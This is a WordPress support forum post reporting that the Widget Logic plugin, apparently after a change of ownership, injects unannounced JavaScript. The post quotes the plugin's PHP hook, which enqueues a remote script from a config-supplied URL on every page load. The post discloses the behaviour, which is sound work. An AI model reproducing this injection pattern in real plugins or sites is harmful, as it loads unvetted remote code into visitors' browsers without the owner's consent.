Title: Plugin is injecting unwanted scripts / malicious code
Last modified: August 16, 2024

---

# Plugin is injecting unwanted scripts / malicious code

 *  [janh2](https://wordpress.org/support/users/janh2/)
 * (@janh2)
 * [1 year, 9 months ago](https://wordpress.org/support/topic/plugin-is-injecting-unwanted-scripts-malicious-code/)
 * Seems like ownership of this plugin has changed recently and it’s now being used
   to push a service (widgetlogic dot org).
 * To achieve this, it is injecting javascript into preload. Neither is this opt-
   in, nor was it announced.
 * It’s unfortunately a more and more common issue, and this seems to be just another
   case.
 * [https://plugins.trac.wordpress.org/browser/widget-logic/trunk/widget.php](https://plugins.trac.wordpress.org/browser/widget-logic/trunk/widget.php)
 *     ```wp-block-code
       add_action('wp_enqueue_scripts', function() {    $cfg = require('widget_cfg.php');    $url = $cfg['base'];    $ver = $cfg['ver'];    $t = time();    $t = $t - $t%(12*60*60);    wp_enqueue_script( 'widget-logic_live_match_widget', "{$url}{$ver}/js/data.js?t={$t}", array(),  '6.0.0', true);});
       ```
   

The topic ‘Plugin is injecting unwanted scripts / malicious code’ is closed to new
replies.

 * ![](https://s.w.org/plugins/geopattern-icon/widget-logic_c8dde5.svg)
 * [Widget Logic](https://wordpress.org/plugins/widget-logic/)
 * [Frequently Asked Questions](https://wordpress.org/plugins/widget-logic/#faq)
 * [Support Threads](https://wordpress.org/support/plugin/widget-logic/)
 * [Active Topics](https://wordpress.org/support/plugin/widget-logic/active/)
 * [Unresolved Topics](https://wordpress.org/support/plugin/widget-logic/unresolved/)
 * [Reviews](https://wordpress.org/support/plugin/widget-logic/reviews/)

 * 0 replies
 * 8 participants
 * Last reply from: [janh2](https://wordpress.org/support/users/janh2/)
 * Last activity: [1 year, 9 months ago](https://wordpress.org/support/topic/plugin-is-injecting-unwanted-scripts-malicious-code/)
 * Status: not resolved